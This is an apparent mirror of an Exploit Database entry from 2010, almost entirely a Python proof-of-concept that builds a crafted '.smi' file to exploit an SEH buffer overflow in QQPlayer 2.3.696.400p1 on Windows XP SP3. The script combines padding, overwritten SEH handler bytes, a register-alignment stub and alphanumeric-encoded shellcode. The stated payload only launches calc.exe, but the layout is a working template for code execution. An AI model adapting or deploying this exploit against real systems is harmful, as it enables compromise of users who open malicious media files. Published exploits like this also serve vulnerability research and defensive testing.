QQPlayer 2.3.696.400p1 – ‘.smi’ File Buffer Overflow

• Exploit Database
• 34 阅读

• 作者： Lufeng Li
  日期： 2010-07-27
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/14482/

• #!/usr/bin/env python
  
  #################################################################
  #
  # Title: QQPlayer smi File Buffer Overflow Exploit
  # Author: Lufeng Li of Neusoft Corporation
  # Vendor: www.qq.com
  # Platform: Windows XPSP3 Chinese Simplified
  # Tested: QQPlayer 2.3.696.400p1
  # Vulnerable: QQPlayer<=2.3.696.400p1
  # Exploit-DB Notes: A different SEH addr might be necessary for XP SP3 ENG.
  #Make sure EAX aligns to the shellcode before decoding.
  # Payload=calc.exe
  #
  #################################################################
  # Code :
  
  head ='''<smil>
   <head>
  <meta name="title" content="_"/>
  <meta name="author" content="Warner Music Group'''
  
  junk = "A" * 2001
  nseh ="\x42\x61\x21\x61"
  seh="\x39\x0c\x41\x00"
  adjust="\x30\x83\xc0\x0b"
  shellcode=("PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIKLM8LI5PUPUPSPMYZEV"
   "QN2BDLKPRVPLKQB4LLK0RR4LKSBWX4ONW1ZWVFQKO6QO0NLWL3QSLS26L7PIQ8ODM5QIWKRZPPRQGL"
   "KQB4PLKPB7L5QXPLKQP2XK5IP44QZ5QXPPPLKQX4XLKQHGPUQN3KSGLQYLKP4LKUQ9FFQKOVQO0NL9"
   "QXODM5QYWFXKPD5JT4C3MZXWK3MWTT5KRPXLKQHWTEQ8SCVLKTLPKLKQH5LEQN3LKS4LKC1XPMY1TW"
   "TGT1KQKSQ0YPZ0QKOKP0XQOQJLKTRJKMVQMCZUQLMLEOIUPUPC0PPRHP1LKROLGKON5OKZPNUORF6R"
   "HOVLUOMMMKOIE7LC6SLUZMPKKM0BU5UOKQWB32R2ORJ5PPSKOHUE3512LSS6N3U2X3UUPDJA")
  junk_="R"*8000
  foot ='''"/>
   </head>
   <body>
   <seq>
  <video src="rtsp://sos08-1-rm.eams.net/lis/424444/.uid.M0001" title="_"fill="freeze"/>
  </seq>
   </body>
  </smil>
  <!-- Generated by Akamai Stream OS BOSS (v10.0.14-20100129) / d366992c -->'''
  payload=head+junk+nseh+seh+adjust+shellcode+junk_+foot
  
  fobj = open("poc.smi","w")
  fobj.write(payload)
  fobj.close()